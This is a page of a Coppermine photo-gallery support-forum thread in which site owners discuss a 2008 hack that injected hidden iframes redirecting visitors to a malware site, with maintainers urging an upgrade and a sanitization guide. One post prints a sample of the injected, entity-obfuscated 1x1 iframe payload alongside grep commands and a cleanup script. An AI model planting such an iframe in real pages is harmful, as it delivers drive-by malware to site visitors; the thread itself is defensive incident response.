Someone has Redirected my Site to cdpuvbhfzz.com-What do I do? - Page 13 Someone has Redirected my Site to cdpuvbhfzz.com-What do I do? - Page 13
 

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Main Menu

Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?

Started by htgguy, April 06, 2008, 10:04:11 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Ralf Night


Joachim Müller

Quote from: Joachim Müller on April 15, 2008, 04:58:28 PM
As suggested I have tried to come up with an article that explains how to thoroughly sanitize your hacked coppermine-driven site. I have started a thread named "Yikes, I've been hacked! Now what?" and locked it on posting to avoid it from getting cluttered similarly to this one. HTH

Joachim

Understudy

Please note the latest version of coppermine covers this issue. If you haven't updated it's your own fault.
Note this describes me working on a FreeBSD server. I suppose it will also work on a Linux Server. Windows I have no idea.

With the recent exploit on mysql and my own concerns for security. I figured I would help out those who are not 24/7 sys admins.

The exploit caused some out there to be hijacked by snot nosed script kiddies who put nasty things in coppermine pages and made life miserable for windoze users who are affected by every virus out there.

The script would be placed in an iframe tag with a wierd numbered picture.
You can find by going to your coppermine directory and running this command:
grep -r 'iframe src' *
If you see something like this:
albums/userpics/10001/45563131x.jpg:echo <iframe src=\"&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;\" width=1 height=1></iframe>
It could be bad.

You could also discover it by doing this:
lynx -dump http://foo.com/copperminedirectory/thumbnails.php?album=XXX (where XXX is the number of an  album)

Lynx is a *nix based text browser.

You would see in the output something like this:
References

   Visible links
   1. http://flboioawone.com  <-- not a real link. The gibberish type URL is what you are looking for.

What you want to make note of is the numbered .jpg (45563131x.jpg shown under the grep command) and the wierd url shown under the lynx command.

Both of these would be signs that someone who still lives in mom's basement exploited a vulnerability.

You job is to remove them.

How do we do that.
Coppermine has a nice shell script.
#!/bin/sh
grep -rl '<iframe src="&#104;' . > /tmp/l

for i in $(grep '\.php$' /tmp/l); do
  cp $i $i.corr
  sed "s/<?php echo '<iframe.*<\/iframe>'; ?>//g" $i.corr > $i
done

for i in $(grep '\.html\?$' /tmp/l); do
  cp $i $i.corr;
  sed 's/<iframe src="&#104;.*<\/iframe>//g' $i.corr > $i
done

for i in $(cat /tmp/l); do
  test -f $i.corr && rm $i.corr || echo TODO: $i
done

But you will note that I needed to modify mine
I had '&#104 in my iframes not "&#104. So I had to modify the script a little.

Save the script in your coppermine directory with a nice name like dieiframe and chmod +x then run ./dieiframe and see what the results are.

Run grep -r 'iframe src' * to be sure.
You can also rm -i 45563131x.jpg where ever you find it but that can be tedious. (not your number may be different).

You should also change your login password for admin and users just to be safe.

Sincerely,
Brendhan


Understudy

correcting a typo:
You can also rm -i 45563131x.jpg where ever you find it but that can be tedious. (not your number may be different).

Should read
You can also rm -i 45563131x.jpg where ever you find it but that can be tedious. (note your number may be different).

Sincerely,
Brendhan

Joachim Müller

Thanks for your readiness to share.
Why this is not valid: the iframe injection is the payload of the hack - it will/may differ, as the attack pattern of the hack varies. Might work for you, may or may not work for others. Merging with the thread that deals with the hack.

Ralf Night

OMG :( It didn't help! I did what you told:

Upgrade to 4.18 and then do things in "Yikes, my sites has been hacked!"

and now look: http://gallery.tatushow.com/ :( There's still this stupid iframe with viruses! :(

Ralf Night


François Keller

QuoteUpgrade to 4.18 and then do things in "Yikes, my sites has been hacked!"
surely not. Sanitize your install by looking in the album folder for unexpected files (.zip files etc...) and for infected files (look in all files if you have the virus code who start with <iframe>.
They are plenty threads dealing with this problem.
Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog

Joachim Müller

Quote from: Ralf Night on April 25, 2008, 06:25:01 PM
Upgrade to 4.18 and then do things in "Yikes, my sites has been hacked!"
No, that's not what I said. The thread "Yikes, my sites has been hacked" contains all instructions you need. If you do exactly as suggested there, the upgrade will be performed and your site will be sanitized. Guaranteed. You failed to do as suggested there. Nobody said that you need to upgrade and then perform "Yikes". See how you read advice? Read it carefully.

Ralf Night

I really read it carefully, i did all things many times to be sure! i read it 32232323232 times to be sure! I do everything word by word... After upgrading there weren't mistakes, so i "include" subfolders, and i checked all folders, i deleted 45563131x.jpg + iframes and it's still there! :(

Ralf Night

OMG:( So what i have to do now? If i upgraded that...? :(

tfischer

Quote from: Ralf Night on April 25, 2008, 07:09:55 PM
i read it 32232323232 times to be sure! <snip> i deleted 45563131x.jpg + iframes and it's still there! :(

Now you're just being sarcastic, which doesn't lend people's sympathy to your cause...

-Tim

Ralf Night

I posted it without reading last post, sorry... now i realised... So i upgraded my gallery without firstly doing "Yikes, my site has been hacked"... What i have to do now to safe my gallery? :(

tfischer

Quote from: Ralf Night on April 25, 2008, 07:30:04 PM
I posted it without reading last post, sorry... now i realised... So i upgraded my gallery without firstly doing "Yikes, my site has been hacked"... What i have to do now to safe my gallery? :(

Same thing that you've been told over and over and over (perhaps 32232323232 times):  READ and FOLLOW the information in "Yikes, my site has been hacked".  There are no shortcuts, there are no magic cures. 

-Tim

Ralf Night

But it will make sense? Because you know, i've upgraded my gallery to 1.4.18 FIRST, and then i did Yikes, my site has been hacked... So there's nothing bad? If i do things which were written in Yikes, my sites been hacked, then it will work?

Joachim Müller

Yes, as you have been told now several times.  ::)
Now stop whining and just do as suggested >:(. If you're not able to perform this simple set of instructions, hire someone to do the job for you, as suggested in "Yikes" as well.

Ralf Night

OOOKKK :D Sorry for interrupting... :( So now i'll do this, even if my gallery was upgraded...

kromnaios

Hello. I use coppermine-gallery in 2 sites and it is hacked for second time in three weeks. The first time i upgraded to 1.4.17. Now, it is again hacked on both sites. In one of these, everything is hacked (all the pages, forum, guestbook, gallery) with the iframe tag. I will restore the whole site and upgrade the gallery to 1.4.18. But then, will the gallery be safe or we could have problem again? Is it sure, that 1.4.18 is not vulnerable?

Understudy

Quote from: kromnaios on April 27, 2008, 01:05:08 PM
Hello. I use coppermine-gallery in 2 sites and it is hacked for second time in three weeks. The first time i upgraded to 1.4.17. Now, it is again hacked on both sites. In one of these, everything is hacked (all the pages, forum, guestbook, gallery) with the iframe tag. I will restore the whole site and upgrade the gallery to 1.4.18. But then, will the gallery be safe or we could have problem again? Is it sure, that 1.4.18 is not vulnerable?
Read http://forum.coppermine-gallery.net/index.php/topic,51927.0.html

And yes 1.4.18 covers the issue. You should also change your passwords.

Sincerely,
Brendhan


luzma

Hi,

I have installed coppermine 1.4.10 and It was working fine, but now I don't know what happened because when I open the page: http://www.astrocaat.it/cpg1410/index.php it wants to connect to other site and friends said me that their antivirus detect a virus in this page.

I don't know how resolve the problem, I put on the website the page index.php that I had on my computer but is the same, I haven't an actual backup of the Gallery to put on the website.

Have you seen this problem before ? Can you give me any suggestion ?

Thanks in advance,

Luz Marina